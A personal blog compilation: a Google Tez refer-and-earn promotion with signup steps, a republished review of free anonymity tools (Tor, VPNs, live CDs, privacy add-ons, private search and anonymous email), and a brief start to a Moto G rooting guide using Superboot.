TEZ – Refer and Earn (LEGIT)

Google TEZ

Google Tez Refer & Earn Offer Detail – Hello Friends!! Here is Another maha loot by Tez App which is owned by Google India. By “Google Tez” UPI App you can experience fastest UPI Transactions.
This Is New App for UPI Payment, Send Money to friends and Receive Payments directly in your Bank Account.
This is based on NPCI’s (National Payments Corporation of India) Unified Payments Interface (UPI), money transfers are simple & secure with Tez.

Google_play_1x

Google Tez Refer & Earn Offer –

Google Tez announced Refer & Earn Offer through which you will get Rs.51 on Sign Up as well as Rs.51 when your referred friends complete his first Transaction of Rs.1 Minimum. You can Earn Maximum Rs. 9000 .

You & Your Friend Both Will Get  Free Rs.51 Cashback On Directly In Bank When You Do Rs.1 Transaction.

How To Get Rs.51 on Bank Account by Registerering on Tez App ? And Refer & Earn Rs.51

1. Firstly Install Google Tez from  Here.

download_1x

2. Allow All Permission in Google Tez App.

3. Choose Language and Enter Your Mobile Number which is Registered in Your Bank.
link_your_bank_1x
4. Verify Your Mobile Number by Entering OTP and Login with Email id

5. You can Secure your Google Tez App by Google Pin or Mobile Pattern.

6. Go To Setting option > Bank Account > Select Your Bank > Create UPI PIN Or verify Your Bank Account With UPI PIN

save_your_pin_1x

Or Simply Click on ” Add Bank Account “.

Choose the Bank which you own. And Verify with the Sim which is Registered in Bank.

Now Complete a Transaction of Rs.1 and Get Rs.51 Instantly.

ready_to_go_1x

7. In Dashboard you can see send money option, Send Money to your Friends Tez Numbers.
If your friends don’t have Tez Account then you can send us by Clicking on New and entering UPI ID as “pshycoblaize@okaxis “. ( send only Tez UPI ID/ Number)

rewards_1x

Refer and Earn.

Tez Referrals Offer

  • You may invite anyone to join Tez and if your invitee registers on Tez through your unique Tez invitation link (see offer details for your unique link), and successfully completes a payment using the Tez app, you are eligible for the Tez Referrals Offer.
  • You and the invitee will receive Indian Rupees Fiifty One (INR 51) each, in yours and the Invitee’s designated bank account. As such, you and your invitee must have a UPI-enabled bank account attached to your respective Tez accounts to receive payment from Google.
  • You can only take advantage of this offer once per registered invitee. Invitee can only take advantage of this offer for his first Tez transaction.
  • You can earn a maximum of 50 referral rewards.
  • You can earn referral rewards up to a total value of Indian Rupees Nine Thousand (INR 9,000) per financial year (1 April to 31 March), across all Tez offers.
  • Employees, interns, contractors and office-holders, as well as their immediate families (parents, siblings, children, spouses and life partners of each, regardless of where they live) of Google Inc, its affiliates and subsidiaries, and any representatives or agencies of Google or other persons professionally connected with the offer, are not eligible to participate.


:Soumik Ghosh:

Best Free Anonymous Surfing Services

First, The Types Of Connections Which Enable Anonymous Surfing :-

  •  P2P — P2P ( Peer To Peer ) is a decentralized network that routes data through multiple peers as identifiable data pieces by location-independent keys. It is generally secure but could potentially be insecure as a peer could log information about the data passing through it..
  • Proxies – Routing machines named proxy servers continuously act upon your transfer requests to forward data, allowing you to avoid direct communications with the telltale point of contact where the data packets usually would be handled. It is secure to a degree, though in fact routes can only be technically random and any logging of this passing data means vulnerability.
  • VPN – A virtual private network that securely tunnels all of your information from one point to another, in essence meaning your data transfer appears to initiate from a remote machine. Generally very secure but could potentially be insecure as the remote server could log information easily about the data that you send or receive through it.
Cross-Platform Solutions

JonDo (previously known as JAP) is a client program, used with a Proxy Server system, written in Java for routing data across the JonDo network. Unfortunately, being Java based means that the application is rather bloated. Even so, to make up for this large amount of memory consumption, JonDo does have an attractive and user-friendly GUI, which displays lots of visual information about your connection to the JonDo network. Additionally, Java-based also means that it is truly cross-platform.

The free service offers 30-50 kBit/s speeds and unlimited bandwidth. The commercial option offers a lot more features such as higher speeds, access to all ports and SOCKS5 support.

The JonDonym group provide a free browser profile for Firefox called JonDoFox. It is preconfigured to be highly anonymous out of the box and features lots of useful add-ons, such as No-Script, CS Lite and AdBlock Plus. Because it is completely free and has all these outstanding features, I highly recommend it to anybody that is serious about anonymity. Bear in mind, however, that JonDo does set limits on the number of users allowed for all of their free servers, and this limited capacity means that its network is often overloaded at peak times. Consequently, you may not be able to connect on your first attempt.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating:  Slow. 30kbps-50kbps (Dial-up speeds).
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Minimal. They log bandwidth usage for accounting purposes.
  • Server Location(s): Worldwide
  • Operating System(s):
  • WOT  Rating:  Excellent (WOT is explained much further down).
  • 76MB of RAM usage when running.
  • There is a portable version available.

The Tor Browser Bundle is comprised of a client front-end program, Vidalia, for the Tor proxy that comes bundled with Tor and The Firefox web browser, and their purpose is to route data across the Tor network. There are quite a few bundles offered for users to get started relatively quickly. If you do not opt for the preconfigured Tor browser bundle, you must configure your machine’s local proxy port to use Vidalia’s default port of 8118 in order to use the programs. Vidalia allows you to change your IP continually in order to mask your Internet trail to provide greater anonymity.

There are not a lot of complicated features or configuration options. It is a basic front-end, which strives to keep the user’s experience as simple and secure as possible while the backend to Tor, which is largely hidden, is itself very complicated. The program also allows users, if desired, to become relays for the Tor network, helping censored users connect to the network undetected. Vidalia even has an eye-candy feature showing a map of Earth with lines representing connections to the Tor server participants and very nice bandwidth graphs.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating:  Medium
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level:   Unknown. It varies from node to node. Some may log you and some may not. Review this page for more info about entry and exit nodes.
  • Server Location(s): Worldwide
  • Operating System(s):
  • WOT  Rating:  Excellent.
  • There is a portable version available.
  • 24 – 32MB RAM usage when running with an additional 4MB used for Polipo and another 16.5 MB for the Tor engine.

PacketiX.NET is free service offered by SoftEther Corp as an academic experiment run by the University of Tsukuba in Japan. Unlike Hotspot Shield and countless other VPN clients, it is not based on OpenVPN but instead uses a proprietary system. Like most other VPN connections, it encrypts all of your Internet activities.

The actual client itself is very customisable and powerful, allowing you to get the most out of your VPN connection. There are a number of features from setting the number of TCP connections and enabling data compression to maximize throughput. The actual speed you get ultimately depends on your geographic location in relation to Japan. This means that a lot of people may experience slow connections (especially Europeans). The GUI is very simple and easy to use. Installation is rather simple, but you need to download the client and an additional configuration file. They have a nice tutorial on their website that guides you through the whole process to make it easier for you.

Although they do keep logs, they are open about it. You have to read and accept an agreement stating that you will not use the service ‘to do crime’ as they put it. As long as you’re not doing anything you shouldn’t be doing, it should not concern you greatly.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Medium
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: High. Logs are kept permanently.
  • Server Location(s): Japan
  • Operating System(s):
  • WOT  Rating:  Excellent.
  • 19MB of RAM usage when running.

JanusVM is based on VMware and is a type of product often referred to as an “Appliance” in the parlance of virtualization software, which means basically that it is a group of programs and settings preconfigured by and large from the vendor, and usually ready to run “out of the box,” so to speak. In this case, specifically, it is an Internet Privacy Appliance comprised of Tor, Privoxy, Squid and OpenVPN, which run in a virtual machine as a preconfigured client. This really is a superior product compared to other Tor solutions as it combines the power of Tor, Privoxy, Squid and OpenVPN to increase anonymity.

I would recommend this option for intermediate to advanced computer users as it is not simply a case of ‘click-click-done’ by any means, in spite of what the terminology suggests. It requires the installation of VMware Player (which is free), the configuration of a VPN connection and some background reading (albeit quite minimal). There is also a nicely-made video tutorial for beginners who want to try out this solution. VMware Player is required to be running every time you want to use JanusVM. While this may not be an issue for most, those with older hardware might struggle to deploy a virtual machine, if they can manage it at all. Apart from these potential technical difficulties with running the virtual machine, it can be highly inconvenient for some to have it running all the time. This is the kind of decision you will have to make when considering anonymity options. One hundred and twenty-eight MB of RAM is a bare minimum to run a virtual machine! Still, if you have only this amount of RAM available, you should consider first upgrading to a higher amount.

In addition, once JanusVM is set up correctly, you will then have to configure your operating system’s network connection manager to dial into JanusVM. The people over at project JanusVM also offer a hardware based solution, dubbed JanusPA. It is really interesting as it encrypts all of your data going through your ADSL modem or router, meaning literally nothing can get through that is not ‘Torified’, that is, running through the Tor network. More information can be found here. Even though they are currently out of stock of this hardware device, it is worth a look anyway.

Here are some technical points regarding the solution:

  • Speed Rating: Generally slow
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Unknown. It varies from peer to peer. Some may log you and some may not. Review this page for more info about entry and exit nodes.
  • Server Location(s): Worldwide
  • Operating System(s):
  • WOT  Rating:  Excellent
  • 53  MB of RAM usage when running.

proXPN is a VPN client based on OpenVPN; however, there is a PPTP service also on offer for mobile phone users. They currently have servers located in the USA and are looking to expand into Europe.  Therefore, speeds vary depending on your location. Overall, speeds are generally very fast for most users. With it being a VPN client, it encrypts all of your Internet activities. They use a 512-bit level of encryption with 2,048-bit certificates for users to achieve high levels of anonymity.

Unfortunately, registration is mandatory in order to use the service. Of course, for the extremely paranoid folk among you, fake details may be provided, but a real e-mail address must be used in order to activate an account. Then again, this e-mail address could also be anonymous. Sorry if I confused anyone with that last sentence!

The GUI is very basic and user-friendly. Even so, it could use a little reworking, like removal of some tabs and integrating some controls into one window for starters. One problem I encountered is that proXPN appears to run on start-up by default for me and cannot be stopped easily. As far as I know, this problem occurs only in Windows 7 Professional 64-bit. Use the comments section for assistance with this. It’s available for a wide variety of operating systems, including Microsoft’s modern operating systems, such as Windows XP, Windows Vista, Windows 7 and Windows Mobile, as well as a range of Apple based operating systems, such as Mac OS, iPhone and iPod Touch. It may work for older operating systems such as Windows 98 and 95, but they are not officially supported.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Free accounts are limited to 100kbps.
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Minimal. They log connection time and date, your bandwidth usage and your registration details. Logs are kept for a roughly 2 weeks.
  • Server Location(s): USA
  • Operating System(s):
  • WOT  Rating:   Excellent.
  • 3.6MB of RAM usage when running (+3MB for OpenVPN).

USAIP is a PPTP/L2TP/OpenVPN VPN service. Having servers in the United States, the United Kingdom, Germany, the Netherlands, Hungary and China, their network should deliver good connection speeds to most people around the world.

Because PPTP and L2TP are protocols and not applications, they are not bound to any one operating system, even though Microsoft played a major part in their development. As a result, you can make use of the USAIP service with the standard network connection manager program found in most any Windows distribution, such as Windows 2000, Windows XP, Windows Vista or Windows 7, even older Windows systems such as Windows ME, Windows 98 and Windows 95.

Additionally, the USAIP services may be used in other operating systems as well, such as MAC OS and Linux, which already include VPN clients within their respective operating systems. The program effectively tunnels all of your data through this service.  Consequently, not only your web browsing session is anonymous, but all of your Internet activities are likewise so. This is indispensable for applications that use other protocols, such as UDP. I used to play online games using this service, and my ping was higher than many of the programs listed here can offer.

The free service has unlimited bandwidth, and you can use it for as long as you wish. However, there is one big catch. They allow you to try their service for absolutely nothing but disconnect you every seven minutes to entice you to upgrade to one of their premium packages. Actually, this caveat sounds a lot worse than it actually is, and we cannot complain too much because we can, after all, automatically redial immediately after we have been disconnected. Most of the network connection programs have an automatic redial function available, so make good use of it. In many cases being disconnected every 7 minutes can be unnoticeable, but if you are playing online games frequently, as I noted earlier, then getting disconnected is going to be very noticeable! Indeed, I would prefer using this service as a backup to some of the other services listed on this page.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Minimal. They log bandwidth usage and keep them for 48 hours.
  • Server Location(s): USA UK Germany The Netherlands China
  • Operating System(s):
  • WOT  Rating:  Unknown.

VPNReactor is a L2TP/PPTP/OpenVPN VPN service similar to USAIP. They currently only have servers in the USA, so speeds may vary.

Most of the points that were mentioned about USAIP apply to this product too. While the free service also has unlimited bandwidth and usage, the only major difference is that the VPN connection disconnects every 30 minutes. Registration is mandatory, and they also require users to reactivate their accounts monthly. I’m not sure if they support mobile devices, but in theory they should support any devices that use PPTP or L2PT.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Minimal
  • Server Location(s): USA
  • Operating System(s):
  • WOT  Rating:  Excellent.

Your Freedom is a Java-based “sophisticated tunneling solution” offered by resolution GmbH. Again, being Java-based means that it is truly a cross-platform solution. The GUI lacks elegance, and it looks plain and simple, even for Java. On the other hand, they have servers located worldwide, have support for lots of protocols, for instance, UDP, and they allow you to play online games using the tunnel.

However, the speeds are on the slow side: 64 kbit/s dial-up speed for free users. They also limit usage of the proxy tunnel for up to 6 hours per day or up to 15 hours per week. It’s not much at all and that is why I recommend this service rather as a backup solution. They only keep logs of your statistical data for accounting purposes.

  • Speed Rating: Slow. 64kbits/s (Dial-up speed).
  • Anonymity Rating: High
  • Usage Allowance: Low. Up to 6 hours per day and up to 15 hours per week.
  • Logging Level: Minimal. They only keep logs of part of your IP (16-bit or half of your IP address) and your statistical data for accounting purposes only and are usually deleted within 4 weeks.
  • Server Location(s): Worldwide
  • Operating System(s):
  • WOT  Rating:  Excellent.

Windows Based Solutions

The xB Browser (or XeroBank Browser, previously known as TorPark) is a Firefox and Tor bundle. It was at one time unique compared to the other Tor programs, offered as an ‘all-in-one’ solution. You can start surfing anonymously straight out-of-the-box. Firefox users will feel comfortable using the XeroBank Browser as it is based on the same browser. Speeds vary as they do with all Tor connections, but you will find they are usually quite slow. You may be able to speed things up somewhat by disabling images (add-on download required).

Here are some technical points regarding the program:

  • Speed Rating: Slow
  • Anonymity Rating: Medium-Low
  • Usage Allowance: Unlimited
  • Logging Level: Unknown. It varies from peer to peer. Some may log you and some may not. Review this page for more info about entry and exit nodes.
  • Server Location(s): Worldwide
  • WOT  Rating:  Excellent.

Hotspot Shield is a free VPN client based on OpenVPN. Unlike other anonymous surfing options, such as JonDo or Tor, Hotspot Shield encrypts all of your Internet activities and not just web browsing. This is ideal for people who want to anonymise other applications without the need to ‘proxify‘ them, which can be a complicated and tedious task.

Anchorfree does not collect any identifiable information about you, so you can rest assured that your privacy is not compromised. Another advantage to using this option compared to others is its speed. I was pleasantly surprised when I first used Hotspot Shield as the speed was noticeably much faster than Tor and JonDo’s free servers combined. It can load web pages nearly as fast as my unencrypted connection can even in ideal circumstances.

One catch to the service, however, is that Anchorfree displays advertisements on every web page that you visit. Luckily, those who have the AdBlock Plus andNoScript addon for Firefox won’t see ANY adverts at all; but those who use Internet Explorer, Google Chrome, Opera, Safari or any other browsers without equivalent plug-ins will see them. This isn’t necessarily a bad deal considering what you are getting; namely, a commercial-like service for the sake of a few adverts (or none if you’re a Firefox/AdBlock Plus/NoScript user). If you really cannot tolerate the advertisements, then I highly recommend that you use JonDoFox, a free Firefox profile which includes all the necessary plugins (including AdBlock Plus and NoScript) for greater anonymity and to block Hotspot Shield’s adverts.

We’ve already sung the praises about JonDoFox above in the JonDo review, I really recommend you get it! Hotspot shield can seem a bit intrusive as it always loads with Windows and cannot be stopped unless you disable its services. This isn’t necessarily a bad thing for fast computers but if you’re using something with minimal resources, then you’ll want to preserve as much RAM as possible. In that case I would suggest you configure your operating system to disable HotSpot shield’s services, of which there are three in total. If you’re a regular user, this may be an advantage to you!

Now for a few technical points regarding the program.  There is no standalone GUI for the program, but instead it uses a web page interface.  It is very simple to use as it has only two buttons, connect and disconnect.  It is a relatively small download (5258kB), which includes the necessary OpenVPN components, and it uses around 68Mb of memory when running. No registration is required.  Anchorfree has a number of high-speed dedicated servers based in different locations in the United States.

More information about the data that Achorfree does collect can be found at thispage. Achorfree also offers a UK version of this popular product calledExpatShield, which can be used to access the popular BBC iPlayer serivce from outside the UK.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Medium. 5 GB per month.
  • Logging Level: Minimal. They log connection times and volume of traffic.
  • Server Location(s): USA UK
  • WOT  Rating:  Good.

AdvTor is a powerful alternative to the Vidalia bundle and as the name suggests, it is built with the advanced Tor user in mind. You can customise pretty much any aspect of your Tor connection, from bandwidth throttling to manual entry or exit node selection. One of its nicest features is the ability to force a program to use your Tor connection! Although that particular feature is in a Beta stage, I’ve managed to get various programs to work with it. This feature is very promising. Try it yourself, force a program such as an instant messaging client to use Tor without changing its internal proxy settings. This is great for applications that simply refuse to use your Tor connection.

It’s important to note that Tor does not support the UDP protocol, so programs that use this protocol will send and receive UDP packets unencrypted over your network connection and untouched by Tor. As far as I know, there is no way to route UDP packets over the Tor network and there are no plans to implement such a feature.

The GUI isn’t particularly elegant or user-friendly, but for all it lacks in looks, it makes up for in features. A must have for advanced Tor users.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Slow (high with custom configuration)
  • Anonymity Rating: Medium-High
  • Usage Allowance: Unlimited
  • Logging Level: Unknown. It varies from peer to peer. Some may log you and some may not. Review this page for more info about entry and exit nodes. (Minimal with custom configuration)
  • Server Location(s): Worldwide
  • WOT  Rating:  Excellent.
  • 8MB of RAM usage when running.
  • There is no installer file. The program is provided in a Zip archive.
  • Since there is no installer, the program is fully portable.

SecurityKiss is a simple Windows VPN client based on OpenVPN. They have servers located in Germany, the United States of America, The United Kingdom, Switzerland and are looking to expand into other locations. Speeds are relatively fast depending on your location to the nearest server. They do not cap speeds and use data compression to ensure you get the very best connection.

There is a 300 MB per day limit for free users, which they insist will always be free, will never decrease but may increase in the future. This would work out as roughly 9GB a month, which is more than adequate for surfing the web or very light to moderate downloading activities.

The GUI is very basic; it features a connect and a disconnect button, a button to change servers and a button to leave feedback. It also displays how much of your daily download quota has been used and how long before a new cycle begins.

SecurityKiss insist they do not keep personally identifiable data about their users and only log your IP addresses, connection/disconnection times and traffic volume. They use the 128-bit Blowfish algorithm to encrypt session data and use 1024-bit RSA certificates for session keys. Therefore, users can be assured thatnobody can eavesdrop on your data.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Medium 300 MB per day
  • Logging Level: Minimal. They only log your IP address, connection/disconnection times and traffic volume which are kept permanently.
  • Server Location(s): USA UK Germany Switzerland Canada
  • WOT  Rating:  Unknown.
  • 2MB of RAM usage when running (+3MB for OpenVPN).
  • Available for both 32-bit and 64-bit Windows.

UltraSurf is a VPN program for Windows. They have servers located in USA and collect the following data about you; your IP; the properties of browser and/or your computer; the number of links you click within a site; state or country from which you accessed the site; date and time of your visit; name of your ISP; web page you linked to our site from; and pages you viewed on the site.

The GUI is very basic with a few standard Windows-like buttons to access options, help and to exit the program. There are radio buttons for server selection and that’s all that is interesting about the GUI apart from the server utilisation displays which are helpful in deciding which server is currently the fastest.

At the moment, users are unable to change the default port (9666) to a custom one. Users should be aware of any restrictions that prevent the program from listening on that port before attempting to use it. NB: Some antivirus programs falsely identify Ultrasurf as a virus/trojan as it can penetrate through firewalls. This is a false positive. Please be aware of this if you get any alerts and such.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: High. UltraSurf collect the following data; your IP; the properties of browser and/or your computer; the number of links you click within a site; state or country from which you accessed the site; date and time of your visit; name of your ISP; web page you linked to our site from; and pages you viewed on the site.
  • Server Location(s): USA
  • WOT  Rating:  Good.
  • 5MB of RAM usage when running.

CyberGhost VPN is a VPN client offered by S.A.D. GmbH, whose servers are based in Germany. It uses 128-bit AES encryption on all connections to ensure a high level of anonymity and special data compression techniques to make speeds faster. With its free service, you get 1 GB a month, which is more than enough for surfing the web.

It has a clean, intuitive and user-friendly GUI. It supports lots of languages including English, German, French, Italian, Spanish, Polish. This is a more complete solution compared with others listed here, one which is great for everyone. You may have to wait in a queue during peak times due to the service’s popularity.  I am very pleased with this product and believe that it is well worth a good look to anybody serious about his or her privacy and anonymity.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Fast
  • Anonymity Rating: High
  • Usage Allowance: Low (1 GB a month)
  • Logging Level: Unknown. Awaiting a response from the CyberGhost VPN team.
  • Server Location(s): Germany
  • WOT  Rating:  Excellent.
  • 27MB of RAM usage when running.
  • You must register in order to use this service.

Freegate is a free proxy offered by Dynamic Internet Technology Inc. This specific program offers unrestrictred access for Chinese users but restricted access for all others. The extent of this restriction is unknown, but I have successfully managed to search Google, load up YouTube and Facebook without hassle. Obviously, this feature makes it a great choice for Chinese users.

  • Speed Rating: Medium.
  • Anonymity Rating: Medium.
  • Usage Allowance: Unlimited.
  • Logging Level: Unknown.
  • Server Location(s): Worldwide
  • WOT  Rating:  Excellent.
  • 15 MB of RAM usage when running.
  • Fully Portable.

Linux Based Solutions

The (Amnesic) Incognito Live System is a Debian-based (i.e., Linux) Live CD. It can be downloaded as an ISO file and then burned to a CD. Then, the user simply boots from the CD, which now contains everything needed to run the OS in RAM without installing any of it to the disk. It will automatically configure your internet connection using your system’s ethernet interface. Vidalia is bundled with the CD, which forces all connections to go through the Tor network. Absolutely no data is stored when using the Live CD unless you explicity configure it to do so. However, data may be stored on a Live USB setup if you like.

The Gnome GUI is very clean and intuitive, as well as easy to use. It is similar to the popular Debian-based Ubuntu distribution. You get some essential software such as an instant messaging client (Pidgin), a secure browser with Tor button (Iceweasel) and an e-mail client (Claws).

Lots of other software packages are also included to help you work productively, such as OpenOffice.org. Lots of network devices are supported out-of-the-box but if you require support, visit their forum here.You do not need a speedy machine in order to use the Live CD as merely 256 MB of RAM or greater is recommended, 128 MB being a bare minimum. One can’t complain too much anyway, given the nice pricetag.  🙂

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Medium
  • Anonymity Rating: High
  • Usage Allowance: Unlimited
  • Logging Level: Unknown. It varies from peer to peer. Some may log you and some may not. Review this page for more info about entry and exit nodes.
  • Server Location(s): Worldwide
  • WOT  Rating:  Good

Privatix is by design almost identical to (Amnesic) Incognito Live System. One significant difference is that the default browser configuration is Firefox with the Tor button. If you want more information on Privatix, read the Amnesic section as most of the points regarding that product apply to this one too. Alternatively, you can visit the project’s website here.

Here are some of my personal ratings and a few technical points regarding the program:

  • Speed Rating: Slow
  • Anonymity Rating: Medium-High
  • Usage Allowance: Unlimited
  • Logging Level: Unknown. It varies from peer to peer. Some may log you and some may not. Review this page for more info about entry and exit nodes.
  • Server Location(s): Worldwide
  • WOT  Rating:  Excellent

Test Your Anonymity

JonDonym’s Anontest is a free comprehensive anonymity test. It displays all the information that sites can obtain from you simply by visiting them. Lots of sites gather information about you when you visit which is used to enhance your site experience; however, lots of the information you give out to them is not needed.

Enter; Anontest. It clearly identifies areas of your configuration that are not as secure as they should be and gives suggestions as to how to fix them. Areas are colour coded with easy traffic light colours; red being highly insecure/bad and green being secure/good. They also have a number of other neat features for the ‘techies’:

  • IP Whois
  • Show IP location on a map
  • Traceroute

Curious to know what websites can gather from you just by visting them? Take the Anontest and see for yourself! It’s one of the most essential tools I use to test anonymity.

NB: This test may falsely identify your IP and User-Agent as ‘insecure’, but this may not necessarily be the correct conclusion. The reason it does this is because the test was designed for JonDo+JonDoFox.


Test Your Speed

Speedtest.net is a free service that allows users to test their Internet connection speed based on their location. You can use this to test the speed of your connection when using the products listed above to help you decide which is the fastest solution for you. Be sure to select the nearest server to your location for accurate results. You should be aware that there is generally a trade off between speed and anonymity, especially with free products.


Noteworthy Add-ons for Firefox Users

HTTPS  Everywhere is an add-on for the Firefox browser developed by Electronic Frontier Foundation and supported by The Tor Project , and its purpose is to force your browser into making certain websites to use the secure HTTPS protocol instead of the standard HTTP protocol. Currently, the number of sites it supports is limited by predefined rule-sets, the list of which is growing through updates made periodically. However, custom websites may be added on an ad hoc basis so that users can access other websites using the HTTPS protocol. By using this add-on, or by accessing HTTPS websites where possible, you can automatically increase your level of anonymity. You will find a thorough and fascinating discussion of this topic on the website where it is supported,www.eff.org. Here are but a few of the many sites supported by this excellent Firefox extension:

  • Faceboook
  • GMX
  • Google
  • Ixquick
  • Live (Hotmail)
  • Meebo
  • Microsoft
  • Mozilla
  • NY Times
  • PayPal
  • Twitter
  • Washington Post
  • Wikipedia
  • WordPress

NoScript is a popular and powerful add-on that blocks JavaScript, Java and Adobe Flash html elements present on most websites. All of these are capable of revealing your true IP or host address, as well as compromising other vulnerabilites of your system, even though you may be using a proxy or VPN.  NoScript provides a smartly crafted defense, allowing you to select which elements you wish to run. NoScript is an excellent, open-source and well-maintained extension, which provides you with a broad range of capabilites so that you can take back control of your surfing experience. If you want to make some easy and automatic settings for a broad-brush approach to defense or if you want to fine tune it and tweak the extension for maximum effect, this is the extension you need to get.  With it you can also create a whitelist so that you can permit, for example, JavaScript to run on any of those sites that must have it enabled to work properly.

On the other hand, if you watch videos on YouTube, then it is likely that YouTube is obtaining your true IP address every time you do so, whether or not you connect with a proxy or VPN. If you really want to watch a “must see” video safely, the smarter thing to do would be to download and watch it offline. You can do so with a number of different programs. You may want to look at some of these options: KeepVid alternatives.

BetterPrivacy is another good extension to help protect you from a persistent form of Flash cookie that is more cleverly hidden and dangerous than regular browser cookies because of the way it is placed so as not to be removed with normal browser cleaning procedures. These so-called Super-Cookies are now used pervasively on the web as a means of tracking users’ surfing activities without even making their presence known or apparent. And, what’s more, these cookies NEVER expire! However, with this addon you can easily and automatically have them removed just as quickly as they get placed by a website or just as soon as you close your browser. Sieze the day!

AdBlock Plus is another popular add-on that blocks adverts and tracking elements on webpages. In addition to the loss of a snappy and responsive browsing experience that comes from having too many advertisements choking your bandwidth and memory, malware from malicious sites often makes its way into your browser from intrusive advertising practices. However, these problems can be prevented by this extension because it allows you to install filters to block forms of html bloat and disreputable domains. These filters were designed to install painlessly and seemlessly into the browser’s functionality, and there are several different filter subscriptions to help you keep up-to-date in the never-ending arms race against malware and other kinds of intrusion.

 


Anonymous Search Engines

If you are like me, you spend a fair amount of time on the Web searching. It is a critical function and one of the features that has allowed the Web to thrive and enrich our computing experience. Its importance cannot be overstated. At the same time, this pervasiveness has in no small measure infringed upon our privacy. Privacy is one of the hallmarks of freedom and one of the liberties we need to protect vigilantly. Therefore, it is of paramount importance that we not underestimate the power inherent in the ability to monitor and record our activities while searching on the Web. The search engines you utilize will profoundly affect your rights of privacy, both now and in the future.

Ixquick purports to be the most private search engine on the Web, and it earned the first European Privacy Seal. The search policy is plainly laid out and easy to understand. Simply put, it does not record any of the individually identifying information normally collected by other search engines: IP address, user-agent, search history, etc. Yet, it provides users with comprehensive results and advanced searching features. If you go to Ixquick’s websitehttps://www.ixquick.com/eng/ and click on the About link, you can find out about its functionality and philosophy. I was quite impressed with it, and I use it often. Ixquick also operates another search engine called Start Page, available here:  https://www.startpage.com/. Start Page brings all the power of the Google search functionality to you, along with Ixquick’s additional privacy features, by serving as a proxy between users and the Google website. Accordingly, “On Startpage the privacy of Ixquick is combined with the Web search results from Google.” Thus, for those who are used to Google’s search results but prefer not to expose their personal identities or interests to Google’s logging and tracking procedures, Start Page is the best solution.  I use Start Page as my home page on Internet Explorer 9. It has a built-in proxy function to allow you to visit the search results anonymously via one of the company’s own secure proxies. This provides an additional layer of anonymity without sacrificing any of the results.

Another outstanding search engine that provides privacy combined with excellent results is called DuckDuckGo, which you can find here:  http://duckduckgo.com/.  The name is rather humourous, I know, and its appearance is perhaps a bit childlike, but do not let these features fool you. It is private and powerful. On that linked page you should look carefully toward the bottom, where you will see a few inconspicuous links, one of which is shown as “More”. Click it and you will see much more indeed about this search engine’s functionality and features, and at the top of that page is another “More” button, which you may want to check out for additional information. Like the other two already mentioned, this search engine prides itself on discretion but delivers much more than you would expect from its lack of flare and advertisements.  I also use this site for searching, and I am quite satisfied with it. No frills and no fuss, just anonymity, efficiency and effectiveness.  You really need to check out this ducky yourself!

 


Anonymous E-mail

Anonymous E-mail is a truly anonymous e-mail service which uses random remailers of the mixmaster remailer network. Unfortunately, you cannot receive replies and track the e-mail. It can take up to 12 hours for the recipient to receive the message. In order to ensure your anonymity is not compromised, consider using one of the  programs listed above.

Safe-mail is a secure and anonymous e-mail service. You can define your own e-mail address with the @safe-mail.net domain. As a free user, you get a whopping 3 MB of storage, no downloads, no cookies and no ads. It also includes file storage, secure chat, photo storage, jotter, calender, your own secure messageboard, spam filters and virus protection. It works with most browsers and is compatiable with the following protocols:

  • POP
  • SMTP
  • IMAP
  • S/MIME
  • PKI

Finally, a few tips:

  • If you set a password, don’t forget it! It is impossible to retreive it from them.
  • Try to use one of the programs listed above with this service to increase your anonymity.

HushMail is an anonymous e-mail service. It’s very reliable, secure and completely anonymous. You can define your own e-mail address or generate one and can choose from one of the following domains;

  • @hushmail.com
  • @hushmail.me
  • @hush.com
  • @hush.ai
  • @mac.hush.com

As a free user, you get a whopping 2 MB of storage! In order to keep using the service, you must login at least once every 3 weeks. Finally, a few tips:

  • If you set a password, don’t forget it! It is impossible to retreive it from them.
  • Try to use one of the programs listed above with this service to increase your anonymity.
  • Choose a good encryption question and answer to increase anonymity.

10 Minute Mail is a disposable e-mail service. This service is especially useful for signups and activations where you do not want to disclose your real e-mail address. This acts as a good spam prevention method. A random e-mail is generated and is updated automatically when e-mails arrive.

As the name suggests, the mailbox only lasts for time minutes until it self destructs. However, if you need to use the mailbox for a little bit longer, you can request another 10 minutes quite easily and repeat as many times as required. Highly anonymous as your mail is destroyed after 10 minutes. You cannot send e-mails using this service.

Yopmail is a disposable e-mail service. It is a little more sophisticated than 10 Minute Mail and allows you to define your own e-mail address @yopmail.com or generate a random one. The accounts last for 8 days and then it expires. Again, useful for signups and activations where you do not want to disclose your real e-mail address. You can only send e-mails to other Yopmail users using this service

Source : Techsupportalert!

:Soumik Ghosh:

Root Moto G : Superboot

Super Boot .????

Superboot is a boot.img that when booted, will root your device the first time you boot (installing su and the superuser APK). No need to flash any partitions, no messing with the contents of your data partition, no overwriting the shipped ROM on your device, just boot the boot image using the instructions below and you’re done!

Pre-Requisites!!!

YOU NEED YOUR BOOTLOADER UNLOCKED TO CARRY OUT THIS PROCESS. It’s easy using fastboot, which is included in the download below. The instructions on the Motorola site are very straightforward – visit this page to get started. Unlocking the bootloader will wipe your device.

